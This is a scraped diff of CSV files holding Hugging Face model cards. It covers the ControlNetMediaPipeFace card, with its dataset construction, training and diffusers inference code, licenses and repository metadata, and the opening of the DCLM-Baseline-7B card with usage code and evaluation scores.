|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sideways_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sideways_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sideways_result.png"">|
|
| 43 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/surprised_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/surprised_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/surprised_result.png"">|
|
| 44 |
+
|
| 45 |
+
Images with multiple faces are also supported:
|
| 46 |
+
|
| 47 |
+
<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_source.jpg"">
|
| 48 |
+
|
| 49 |
+
<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_annotation.png"">
|
| 50 |
+
|
| 51 |
+
<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_result.png"">
|
| 52 |
+
|
| 53 |
+
|
| 54 |
+
## Dataset Contents:
|
| 55 |
+
|
| 56 |
+
- train_laion_face.py - Entrypoint for ControlNet training.
|
| 57 |
+
- laion_face_dataset.py - Code for performing dataset iteration. Cropping and resizing happens here.
|
| 58 |
+
- tool_download_face_targets.py - A tool to read metadata.json and populate the target folder.
|
| 59 |
+
- tool_generate_face_poses.py - The original file used to generate the source images. Included for reproducibility, but not required for training.
|
| 60 |
+
- training/laion-face-processed/prompt.jsonl - Read by laion_face_dataset. Includes prompts for the images.
|
| 61 |
+
- training/laion-face-processed/metadata.json - Excerpts from LAION for the relevant data. Also used for downloading the target dataset.
|
| 62 |
+
- training/laion-face-processed/source/xxxxxxxxx.jpg - Images with detections performed. Generated from the target images.
|
| 63 |
+
- training/laion-face-processed/target/xxxxxxxxx.jpg - Selected images from LAION Face.
|
| 64 |
+
|
| 65 |
+
## Dataset Construction:
|
| 66 |
+
|
| 67 |
+
Source images were generated by pulling slice 00000 from LAION Face and passing them through MediaPipe's face detector with special configuration parameters.
|
| 68 |
+
|
| 69 |
+
The colors and line thicknesses used for MediaPipe are as follows:
|
| 70 |
+
|
| 71 |
+
```
|
| 72 |
+
f_thick = 2
|
| 73 |
+
f_rad = 1
|
| 74 |
+
right_iris_draw = DrawingSpec(color=(10, 200, 250), thickness=f_thick, circle_radius=f_rad)
|
| 75 |
+
right_eye_draw = DrawingSpec(color=(10, 200, 180), thickness=f_thick, circle_radius=f_rad)
|
| 76 |
+
right_eyebrow_draw = DrawingSpec(color=(10, 220, 180), thickness=f_thick, circle_radius=f_rad)
|
| 77 |
+
left_iris_draw = DrawingSpec(color=(250, 200, 10), thickness=f_thick, circle_radius=f_rad)
|
| 78 |
+
left_eye_draw = DrawingSpec(color=(180, 200, 10), thickness=f_thick, circle_radius=f_rad)
|
| 79 |
+
left_eyebrow_draw = DrawingSpec(color=(180, 220, 10), thickness=f_thick, circle_radius=f_rad)
|
| 80 |
+
mouth_draw = DrawingSpec(color=(10, 180, 10), thickness=f_thick, circle_radius=f_rad)
|
| 81 |
+
head_draw = DrawingSpec(color=(10, 200, 10), thickness=f_thick, circle_radius=f_rad)
|
| 82 |
+
|
| 83 |
+
iris_landmark_spec = {468: right_iris_draw, 473: left_iris_draw}
|
| 84 |
+
```
|
| 85 |
+
|
| 86 |
+
We have implemented a method named `draw_pupils` which modifies some functionality from MediaPipe. It exists as a stopgap until some pending changes are merged.
|
| 87 |
+
|
| 88 |
+
|
| 89 |
+
# Usage:
|
| 90 |
+
|
| 91 |
+
The containing ZIP file should be decompressed into the root of the ControlNet directory. The `train_laion_face.py`, `laion_face_dataset.py`, and other `.py` files should sit adjacent to `tutorial_train.py` and `tutorial_train_sd21.py`. We are assuming a checkout of the ControlNet repo at 0acb7e5, but there is no direct dependency on the repository.
|
| 92 |
+
|
| 93 |
+
## Downloading:
|
| 94 |
+
|
| 95 |
+
For copyright reasons, we cannot include the original target files. We have provided a script (tool_download_face_targets.py) which will read from training/laion-face-processed/metadata.json and populate the target folder. This file has no requirements, but will use tqdm if it is installed.
|
| 96 |
+
|
| 97 |
+
## Training:
|
| 98 |
+
|
| 99 |
+
When the targets folder is fully populated, training can be run on a machine with at least 24 gigabytes of VRAM. Our model was trained for 200 hours (four epochs) on an A6000.
|
| 100 |
+
|
| 101 |
+
```bash
|
| 102 |
+
python tool_add_control.py ./models/v1-5-pruned-emaonly.ckpt ./models/controlnet_sd15_laion_face.ckpt
|
| 103 |
+
python ./train_laion_face_sd15.py
|
| 104 |
+
```
|
| 105 |
+
|
| 106 |
+
## Inference:
|
| 107 |
+
|
| 108 |
+
We have provided `gradio_face2image.py`. Update the following two lines to point them to your trained model.
|
| 109 |
+
|
| 110 |
+
```
|
| 111 |
+
model = create_model('./models/cldm_v21.yaml').cpu() # If you fine-tune on SD2.1 base, this does not need to change.
|
| 112 |
+
model.load_state_dict(load_state_dict('./models/control_sd21_openpose.pth', location='cuda'))
|
| 113 |
+
```
|
| 114 |
+
|
| 115 |
+
The model has some limitations: while it is empirically better at tracking gaze and mouth poses than previous attempts, it may still ignore controls. Adding details to the prompt like, ""looking right"" can abate bad behavior.
|
| 116 |
+
|
| 117 |
+
## 🧨 Diffusers
|
| 118 |
+
|
| 119 |
+
It is recommended to use the checkpoint with [Stable Diffusion 2.1 - Base](stabilityai/stable-diffusion-2-1-base) as the checkpoint has been trained on it.
|
| 120 |
+
Experimentally, the checkpoint can be used with other diffusion models such as dreamboothed stable diffusion.
|
| 121 |
+
|
| 122 |
+
To use with Stable Diffusion 1.5, insert `subfolder=""diffusion_sd15""` into the from_pretrained arguments. A v1.5 half-precision variant is provided but untested.
|
| 123 |
+
|
| 124 |
+
1. Install `diffusers` and related packages:
|
| 125 |
+
```
|
| 126 |
+
$ pip install diffusers transformers accelerate
|
| 127 |
+
```
|
| 128 |
+
|
| 129 |
+
2. Run code:
|
| 130 |
+
```py
|
| 131 |
+
from PIL import Image
|
| 132 |
+
import numpy as np
|
| 133 |
+
import torch
|
| 134 |
+
from diffusers import StableDiffusionControlNetPipeline, ControlNetModel, UniPCMultistepScheduler
|
| 135 |
+
from diffusers.utils import load_image
|
| 136 |
+
|
| 137 |
+
image = load_image(
|
| 138 |
+
""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_annotation.png""
|
| 139 |
+
)
|
| 140 |
+
|
| 141 |
+
# Stable Diffusion 2.1-base:
|
| 142 |
+
controlnet = ControlNetModel.from_pretrained(""CrucibleAI/ControlNetMediaPipeFace"", torch_dtype=torch.float16, variant=""fp16"")
|
| 143 |
+
pipe = StableDiffusionControlNetPipeline.from_pretrained(
|
| 144 |
+
""stabilityai/stable-diffusion-2-1-base"", controlnet=controlnet, safety_checker=None, torch_dtype=torch.float16
|
| 145 |
+
)
|
| 146 |
+
# OR
|
| 147 |
+
# Stable Diffusion 1.5:
|
| 148 |
+
controlnet = ControlNetModel.from_pretrained(""CrucibleAI/ControlNetMediaPipeFace"", subfolder=""diffusion_sd15"")
|
| 149 |
+
pipe = StableDiffusionControlNetPipeline.from_pretrained(""runwayml/stable-diffusion-v1-5"", controlnet=controlnet, safety_checker=None)
|
| 150 |
+
|
| 151 |
+
pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
|
| 152 |
+
|
| 153 |
+
# Remove if you do not have xformers installed
|
| 154 |
+
# see https://huggingface.co/docs/diffusers/v0.13.0/en/optimization/xformers#installing-xformers
|
| 155 |
+
# for installation instructions
|
| 156 |
+
pipe.enable_xformers_memory_efficient_attention()
|
| 157 |
+
pipe.enable_model_cpu_offload()
|
| 158 |
+
|
| 159 |
+
image = pipe(""a happy family at a dentist advertisement"", image=image, num_inference_steps=30).images[0]
|
| 160 |
+
image.save('./images.png')
|
| 161 |
+
```
|
| 162 |
+
|
| 163 |
+
|
| 164 |
+
# License:
|
| 165 |
+
|
| 166 |
+
### Source Images: (/training/laion-face-processed/source/)
|
| 167 |
+
This work is marked with CC0 1.0. To view a copy of this license, visit http://creativecommons.org/publicdomain/zero/1.0
|
| 168 |
+
|
| 169 |
+
### Trained Models:
|
| 170 |
+
Our trained ControlNet checkpoints are released under CreativeML Open RAIL-M.
|
| 171 |
+
|
| 172 |
+
### Source Code:
|
| 173 |
+
lllyasviel/ControlNet is licensed under the Apache License 2.0
|
| 174 |
+
|
| 175 |
+
Our modifications are released under the same license.
|
| 176 |
+
|
| 177 |
+
|
| 178 |
+
# Credits and Thanks:
|
| 179 |
+
|
| 180 |
+
Greatest thanks to Zhang et al. for ControlNet, Rombach et al. (StabilityAI) for Stable Diffusion, and Schuhmann et al. for LAION.
|
| 181 |
+
|
| 182 |
+
Sample images for this document were obtained from Unsplash and are CC0.
|
| 183 |
+
|
| 184 |
+
```
|
| 185 |
+
@misc{zhang2023adding,
|
| 186 |
+
title={Adding Conditional Control to Text-to-Image Diffusion Models},
|
| 187 |
+
author={Lvmin Zhang and Maneesh Agrawala},
|
| 188 |
+
year={2023},
|
| 189 |
+
eprint={2302.05543},
|
| 190 |
+
archivePrefix={arXiv},
|
| 191 |
+
primaryClass={cs.CV}
|
| 192 |
+
}
|
| 193 |
+
|
| 194 |
+
@misc{rombach2021highresolution,
|
| 195 |
+
title={High-Resolution Image Synthesis with Latent Diffusion Models},
|
| 196 |
+
author={Robin Rombach and Andreas Blattmann and Dominik Lorenz and Patrick Esser and Björn Ommer},
|
| 197 |
+
year={2021},
|
| 198 |
+
eprint={2112.10752},
|
| 199 |
+
archivePrefix={arXiv},
|
| 200 |
+
primaryClass={cs.CV}
|
| 201 |
+
}
|
| 202 |
+
|
| 203 |
+
@misc{schuhmann2022laion5b,
|
| 204 |
+
title={LAION-5B: An open large-scale dataset for training next generation image-text models},
|
| 205 |
+
author={Christoph Schuhmann and Romain Beaumont and Richard Vencu and Cade Gordon and Ross Wightman and Mehdi Cherti and Theo Coombes and Aarush Katta and Clayton Mullis and Mitchell Wortsman and Patrick Schramowski and Srivatsa Kundurthy and Katherine Crowson and Ludwig Schmidt and Robert Kaczmarczyk and Jenia Jitsev},
|
| 206 |
+
year={2022},
|
| 207 |
+
eprint={2210.08402},
|
| 208 |
+
archivePrefix={arXiv},
|
| 209 |
+
primaryClass={cs.CV}
|
| 210 |
+
}
|
| 211 |
+
```
|
| 212 |
+
|
| 213 |
+
This project was made possible by Crucible AI.","{""id"": ""CrucibleAI/ControlNetMediaPipeFace"", ""author"": ""CrucibleAI"", ""sha"": ""f6ed75cc495674bea8bf7409ef3d0e5bfb7d8c90"", ""last_modified"": ""2023-05-19 19:32:02+00:00"", ""created_at"": ""2023-03-30 18:28:07+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1595, ""downloads_all_time"": null, ""likes"": 566, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""safetensors"", ""controlnet"", ""laion"", ""face"", ""mediapipe"", ""image-to-image"", ""en"", ""dataset:LAION-Face"", ""dataset:LAION"", ""arxiv:2302.05543"", ""arxiv:2112.10752"", ""arxiv:2210.08402"", ""base_model:stabilityai/stable-diffusion-2-1-base"", ""base_model:adapter:stabilityai/stable-diffusion-2-1-base"", ""license:openrail"", ""region:us""], ""pipeline_tag"": ""image-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: stabilityai/stable-diffusion-2-1-base\ndatasets:\n- LAION-Face\n- LAION\nlanguage:\n- en\nlicense: openrail\npipeline_tag: image-to-image\ntags:\n- controlnet\n- laion\n- face\n- mediapipe\n- image-to-image"", ""widget_data"": null, ""model_index"": null, ""config"": {}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.full.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.pth', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.full.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.pth', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.fp16.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/diffusion_pytorch_model.fp16.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='gradio_face2image.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='laion_face_common.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='laion_face_dataset.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/family_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/family_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/family_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/happy_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/happy_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/happy_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/neutral_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/neutral_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/neutral_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sad_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sad_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sad_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/screaming_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/screaming_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/screaming_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sideways_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sideways_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sideways_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/surprised_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/surprised_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/surprised_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tool_download_face_targets.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tool_generate_face_poses.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_laion_face.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_laion_face_sd15.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""CrucibleAI/ControlNetMediaPipeFaceSD21"", ""KumaPower/AvatarArtist"", ""TheNetherWatcher/Vid2Vid-using-Text-prompt"", ""MA9149210776/CrucibleAI-ControlNetMediaPipeFace"", ""RickyD/CrucibleAI-ControlNetMediaPipeFaceStreamlit"", ""krnl/venereital-IA-23-space"", ""nehho/CrucibleAI-ControlNetMediaPipeFace"", ""teganmosi/CrucibleAI-ControlNetMediaPipeFace"", ""tellview/CrucibleAI-ControlNetMediaPipeFace"", ""aixk/CrucibleAI-ControlNetMediaPipeFace"", ""satyac/CrucibleAI-ControlNetMediaPipeFace"", ""tidy/CrucibleAI-ControlNetMediaPipeFace"", ""Rooni/ImgToImg"", ""ZeLeL/CrucibleAI-ControlNetMediaPipeFace"", ""Akay2024/CrucibleAI-ControlNetMediaPipeFace"", ""Testboydood/CrucibleAI-ControlNetMediaPipeFace"", ""anonicloudmail/test"", ""hohuiking/CrucibleAI-ControlNetMediaPipeFace"", ""tejas56789ce/CrucibleAI-ControlNetMediaPipeFace""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-05-19 19:32:02+00:00"", ""cardData"": ""base_model: stabilityai/stable-diffusion-2-1-base\ndatasets:\n- LAION-Face\n- LAION\nlanguage:\n- en\nlicense: openrail\npipeline_tag: image-to-image\ntags:\n- controlnet\n- laion\n- face\n- mediapipe\n- image-to-image"", ""transformersInfo"": null, ""_id"": ""6425d4b7d0a9d069e8e0ebbc"", ""modelId"": ""CrucibleAI/ControlNetMediaPipeFace"", ""usedStorage"": 34147689491}",0,,0,,0,,0,,0,"CrucibleAI/ControlNetMediaPipeFaceSD21, KumaPower/AvatarArtist, MA9149210776/CrucibleAI-ControlNetMediaPipeFace, RickyD/CrucibleAI-ControlNetMediaPipeFaceStreamlit, TheNetherWatcher/Vid2Vid-using-Text-prompt, aixk/CrucibleAI-ControlNetMediaPipeFace, huggingface/InferenceSupport/discussions/new?title=CrucibleAI/ControlNetMediaPipeFace&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BCrucibleAI%2FControlNetMediaPipeFace%5D(%2FCrucibleAI%2FControlNetMediaPipeFace)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, krnl/venereital-IA-23-space, nehho/CrucibleAI-ControlNetMediaPipeFace, satyac/CrucibleAI-ControlNetMediaPipeFace, teganmosi/CrucibleAI-ControlNetMediaPipeFace, tellview/CrucibleAI-ControlNetMediaPipeFace, tidy/CrucibleAI-ControlNetMediaPipeFace",13
|
DCLM-7B_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
@@ -0,0 +1,294 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
apple/DCLM-7B,"---
|
| 3 |
+
license: apple-ascl
|
| 4 |
+
---
|
| 5 |
+
|
| 6 |
+
|
| 7 |
+
|
| 8 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/63118add64939fabc0108b28/BB42g4V8HTxb5dR4tcy8A.png"" alt=""DCLM Logo"" width=""800"" style=""margin-left:'auto' margin-right:'auto' display:'block'""/>
|
| 9 |
+
|
| 10 |
+
|
| 11 |
+
# Model Card for DCLM-Baseline-7B
|
| 12 |
+
|
| 13 |
+
DCLM-Baseline-7B is a 7 billion parameter language model trained on the DCLM-Baseline dataset, which was curated as part of the DataComp for Language Models (DCLM) benchmark. This model is designed to showcase the effectiveness of systematic data curation techniques for improving language model performance.
|
| 14 |
+
|
| 15 |
+
## Model Details
|
| 16 |
+
|
| 17 |
+
| Size | Training Tokens | Layers | Hidden Size | Attention Heads | Context Length |
|
| 18 |
+
|------|-----------------|--------|-------------|-----------------|----------------|
|
| 19 |
+
| 7B | 2.5T | 32 | 4096 | 32 | 2048 |
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
### Model Description
|
| 23 |
+
|
| 24 |
+
- **Developed by:** DataComp for Language Models (DCLM) Team
|
| 25 |
+
- **Model type:** Decoder-only Transformer language model
|
| 26 |
+
- **Language(s):** English (primarily)
|
| 27 |
+
- **License:** Apple Sample Code License
|
| 28 |
+
- **Contact:** contact@datacomp.ai
|
| 29 |
+
- **Date:** June 2024
|
| 30 |
+
|
| 31 |
+
### Model Sources
|
| 32 |
+
|
| 33 |
+
- **Repository:** https://github.com/mlfoundations/dclm
|
| 34 |
+
- **Dataset:** https://huggingface.co/datasets/mlfoundations/dclm-baseline-1.0
|
| 35 |
+
- **Paper:** [DataComp-LM: In search of the next generation of training sets for language models](https://arxiv.org/abs/2406.11794)
|
| 36 |
+
|
| 37 |
+
|
| 38 |
+
## Using Model
|
| 39 |
+
|
| 40 |
+
First install open_lm
|
| 41 |
+
|
| 42 |
+
```bash
|
| 43 |
+
pip install git+https://github.com/mlfoundations/open_lm.git
|
| 44 |
+
```
|
| 45 |
+
|
| 46 |
+
Then:
|
| 47 |
+
```python
|
| 48 |
+
from open_lm.hf import *
|
| 49 |
+
from transformers import AutoTokenizer, AutoModelForCausalLM
|
| 50 |
+
tokenizer = AutoTokenizer.from_pretrained(""apple/DCLM-Baseline-7B"")
|
| 51 |
+
model = AutoModelForCausalLM.from_pretrained(""apple/DCLM-Baseline-7B"")
|
| 52 |
+
|
| 53 |
+
inputs = tokenizer([""Machine learning is""], return_tensors=""pt"")
|
| 54 |
+
gen_kwargs = {""max_new_tokens"": 50, ""top_p"": 0.8, ""temperature"": 0.8, ""do_sample"": True, ""repetition_penalty"": 1.1}
|
| 55 |
+
output = model.generate(inputs['input_ids'], **gen_kwargs)
|
| 56 |
+
output = tokenizer.decode(output[0].tolist(), skip_special_tokens=True)
|
| 57 |
+
print(output)
|
| 58 |
+
```
|
| 59 |
+
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
|
| 63 |
+
|
| 64 |
+
|
| 65 |
+
### Training Details
|
| 66 |
+
|
| 67 |
+
The model was trained using the following setup:
|
| 68 |
+
|
| 69 |
+
- **Architecture:** Decoder-only Transformer
|
| 70 |
+
- **Framework:** PyTorch with OpenLM
|
| 71 |
+
- **Optimizer:** AdamW
|
| 72 |
+
- **Learning Rate:** 2e-3 (peak)
|
| 73 |
+
- **Weight Decay:** 0.05
|
| 74 |
+
- **Batch Size:** 2048 sequences
|
| 75 |
+
- **Sequence Length:** 2048 tokens
|
| 76 |
+
- **Total Training Tokens:** 2.5T
|
| 77 |
+
- **Hardware:** Trained on H100 GPUs
|
| 78 |
+
|
| 79 |
+
For more detailed training information, please refer to Section 3.4 and Appendix F of the DCLM paper.
|
| 80 |
+
To ensure our trained model is broadly useful, including for math and coding tasks, we combine our 3.8T [DCLM-BASELINE](https://huggingface.co/datasets/mlfoundations/dclm-baseline-1.0) with the [StarCoder](https://huggingface.co/datasets/bigcode/starcoderdata) and [ProofPile2](https://huggingface.co/datasets/EleutherAI/proof-pile-2) data to arrive at a 4.1T token dataset.
|
| 81 |
+
|
| 82 |
+
## Evaluation
|
| 83 |
+
|
| 84 |
+
Here are the evaluation results for DCLM-Baseline-7B on various tasks (using [llm-foundry](https://github.com/mosaicml/llm-foundry) eval suite)
|
| 85 |
+
|
| 86 |
+
| Task | Score |
|
| 87 |
+
|------|-------|
|
| 88 |
+
| MMLU (zero-shot) | 0.5766 |
|
| 89 |
+
| MMLU (few-shot) | 0.6372 |
|
| 90 |
+
| HellaSwag (zero-shot) | 0.7987 |
|
| 91 |
+
| HellaSwag | 0.8043 |
|
| 92 |
+
| Jeopardy | 0.4745 |
|
| 93 |
+
| TriviaQA | 0.5270 |
|
| 94 |
+
| GSM8K (CoT) | 0.0250 |
|
| 95 |
+
| AGI Eval SAT Math (CoT) | 0.0136 |
|
| 96 |
+
| AQuA (CoT) | 0.0490 |
|
| 97 |
+
| SVAMP (CoT) | 0.4900 |
|
| 98 |
+
| BigBench QA Wikidata | 0.7120 |
|
| 99 |
+
| ARC Easy | 0.8220 |
|
| 100 |
+
| ARC Challenge | 0.5990 |
|
| 101 |
+
| BigBench Misconceptions | 0.6986 |
|
| 102 |
+
| COPA | 0.8500 |
|
| 103 |
+
| SIQA | 0.8291 |
|
| 104 |
+
| CommonsenseQA | 0.8018 |
|
| 105 |
+
| PIQA | 0.8128 |
|
| 106 |
+
| OpenBookQA | 0.4540 |
|
| 107 |
+
| BigBench Novel Concepts | 0.7188 |
|
| 108 |
+
| BigBench Strange Stories | 0.7586 |
|
| 109 |
+
| BigBench Strategy QA | 0.6173 |
|
| 110 |
+
| LAMBADA | 0.8220 |
|
| 111 |
+
| Winograd | 0.8828 |
|
| 112 |
+
| Winogrande | 0.7269 |
|
| 113 |
+
| BigBench Conlang Translation | 0.0244 |
|
| 114 |
+
| BigBench Language Identification | 0.5219 |
|
| 115 |
+
| BigBench Conceptual Combinations | 0.6990 |
|
| 116 |
+
| BigBench Elementary Math QA | 0.3431 |
|
| 117 |
+
| BigBench Dyck Languages | 0.4930 |
|
| 118 |
+
| AGI Eval LSAT AR | 0.2435 |
|
| 119 |
+
| BigBench CS Algorithms | 0.6121 |
|
| 120 |
+
| BigBench Logical Deduction | 0.3620 |
|
